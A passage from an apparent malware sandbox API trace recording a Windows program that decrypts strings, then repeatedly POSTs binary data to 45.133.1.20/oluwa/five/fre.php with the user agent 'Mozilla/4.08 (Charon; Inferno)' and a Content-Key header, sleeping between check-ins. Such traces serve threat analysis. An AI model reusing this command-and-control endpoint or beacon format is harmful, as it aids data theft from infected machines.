hHeap=0x6a0000) returned 1 [0293.088] send (s=0xaec, buf=0x6bd460*, len=242, flags=0) returned 242 [0293.089] send (s=0xaec, buf=0x6bb998*, len=159, flags=0) returned 159 [0293.089] GetProcessHeap () returned 0x6a0000 [0293.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0293.089] recv (in: s=0xaec, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0293.156] GetProcessHeap () returned 0x6a0000 [0293.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0293.157] GetProcessHeap () returned 0x6a0000 [0293.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0293.158] GetProcessHeap () returned 0x6a0000 [0293.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8470 | out: hHeap=0x6a0000) returned 1 [0293.158] GetProcessHeap () returned 0x6a0000 [0293.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0293.159] closesocket (s=0xaec) returned 0 [0293.159] GetProcessHeap () returned 0x6a0000 [0293.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0293.159] GetProcessHeap () returned 0x6a0000 [0293.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.160] GetProcessHeap () returned 0x6a0000 [0293.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0293.160] GetProcessHeap () returned 0x6a0000 [0293.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0293.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x180c) returned 0xaec [0293.163] Sleep (dwMilliseconds=0xea60) [0293.165] GetProcessHeap () returned 0x6a0000 [0293.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0293.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.166] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0293.181] GetProcessHeap () returned 0x6a0000 [0293.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8d10 [0293.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.183] CryptImportKey (in: hProv=0x6befd0, pbData=0x6d8d10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.188] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.190] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.190] GetProcessHeap () returned 0x6a0000 [0293.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8d10 | out: hHeap=0x6a0000) returned 1 [0293.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.191] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0293.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.193] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.194] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0293.194] GetProcessHeap () returned 0x6a0000 [0293.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.195] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.196] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.198] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.199] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.199] GetProcessHeap () returned 0x6a0000 [0293.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0293.199] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.199] GetProcessHeap () returned 0x6a0000 [0293.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0293.200] GetProcessHeap () returned 0x6a0000 [0293.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.201] GetProcessHeap () returned 0x6a0000 [0293.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0293.201] GetProcessHeap () returned 0x6a0000 [0293.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0293.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0293.218] GetProcessHeap () returned 0x6a0000 [0293.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0293.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.219] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.221] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.223] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.223] GetProcessHeap () returned 0x6a0000 [0293.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0293.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.225] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0293.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.227] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.228] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0293.228] GetProcessHeap () returned 0x6a0000 [0293.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.229] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0293.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.230] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0293.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.232] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0293.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.233] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0293.233] GetProcessHeap () returned 0x6a0000 [0293.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0293.233] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0293.233] GetProcessHeap () returned 0x6a0000 [0293.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0293.233] socket (af=2, type=1, protocol=6) returned 0xaf0 [0293.233] connect (s=0xaf0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0293.258] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0293.258] GetProcessHeap () returned 0x6a0000 [0293.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0293.259] GetProcessHeap () returned 0x6a0000 [0293.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da320 [0293.260] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.261] wvsprintfA (in: param_1=0x6da320, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.261] GetProcessHeap () returned 0x6a0000 [0293.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8230 [0293.261] GetProcessHeap () returned 0x6a0000 [0293.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0293.261] GetProcessHeap () returned 0x6a0000 [0293.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0293.261] GetProcessHeap () returned 0x6a0000 [0293.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da320 [0293.262] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.263] wvsprintfA (in: param_1=0x6da320, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.263] GetProcessHeap () returned 0x6a0000 [0293.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0293.263] GetProcessHeap () returned 0x6a0000 [0293.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0293.264] send (s=0xaf0, buf=0x6bd460*, len=242, flags=0) returned 242 [0293.265] send (s=0xaf0, buf=0x6bb998*, len=159, flags=0) returned 159 [0293.265] GetProcessHeap () returned 0x6a0000 [0293.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0293.265] recv (in: s=0xaf0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0293.338] GetProcessHeap () returned 0x6a0000 [0293.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0293.339] GetProcessHeap () returned 0x6a0000 [0293.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0293.340] GetProcessHeap () returned 0x6a0000 [0293.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8230 | out: hHeap=0x6a0000) returned 1 [0293.341] GetProcessHeap () returned 0x6a0000 [0293.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0293.341] closesocket (s=0xaf0) returned 0 [0293.342] GetProcessHeap () returned 0x6a0000 [0293.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0293.342] GetProcessHeap () returned 0x6a0000 [0293.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.342] GetProcessHeap () returned 0x6a0000 [0293.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0293.343] GetProcessHeap () returned 0x6a0000 [0293.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0293.343] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1810) returned 0xaf0 [0293.345] Sleep (dwMilliseconds=0xea60) [0293.347] GetProcessHeap () returned 0x6a0000 [0293.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0293.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.355] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0293.363] GetProcessHeap () returned 0x6a0000 [0293.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b68d8 [0293.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.364] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b68d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.365] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.367] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.367] GetProcessHeap () returned 0x6a0000 [0293.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b68d8 | out: hHeap=0x6a0000) returned 1 [0293.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.369] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0293.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.370] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.371] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0293.371] GetProcessHeap () returned 0x6a0000 [0293.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.372] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.378] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.379] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.380] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.380] GetProcessHeap () returned 0x6a0000 [0293.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0293.380] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.380] GetProcessHeap () returned 0x6a0000 [0293.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0293.381] GetProcessHeap () returned 0x6a0000 [0293.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.381] GetProcessHeap () returned 0x6a0000 [0293.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0293.382] GetProcessHeap () returned 0x6a0000 [0293.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0293.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0293.397] GetProcessHeap () returned 0x6a0000 [0293.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0293.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.398] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.400] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.401] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.401] GetProcessHeap () returned 0x6a0000 [0293.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0293.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.402] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0293.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.404] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.405] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0293.405] GetProcessHeap () returned 0x6a0000 [0293.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.406] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0293.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.407] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0293.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.409] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0293.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.410] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0293.410] GetProcessHeap () returned 0x6a0000 [0293.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0293.410] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0293.410] GetProcessHeap () returned 0x6a0000 [0293.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0293.410] socket (af=2, type=1, protocol=6) returned 0xaf4 [0293.410] connect (s=0xaf4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0293.440] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0293.440] GetProcessHeap () returned 0x6a0000 [0293.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0293.440] GetProcessHeap () returned 0x6a0000 [0293.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da320 [0293.441] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.442] wvsprintfA (in: param_1=0x6da320, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.442] GetProcessHeap () returned 0x6a0000 [0293.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d85f0 [0293.442] GetProcessHeap () returned 0x6a0000 [0293.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0293.442] GetProcessHeap () returned 0x6a0000 [0293.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0293.442] GetProcessHeap () returned 0x6a0000 [0293.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da320 [0293.443] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.444] wvsprintfA (in: param_1=0x6da320, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.444] GetProcessHeap () returned 0x6a0000 [0293.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0293.444] GetProcessHeap () returned 0x6a0000 [0293.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0293.445] send (s=0xaf4, buf=0x6bd460*, len=242, flags=0) returned 242 [0293.446] send (s=0xaf4, buf=0x6bb998*, len=159, flags=0) returned 159 [0293.446] GetProcessHeap () returned 0x6a0000 [0293.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0293.446] recv (in: s=0xaf4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0293.523] GetProcessHeap () returned 0x6a0000 [0293.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0293.524] GetProcessHeap () returned 0x6a0000 [0293.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0293.524] GetProcessHeap () returned 0x6a0000 [0293.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d85f0 | out: 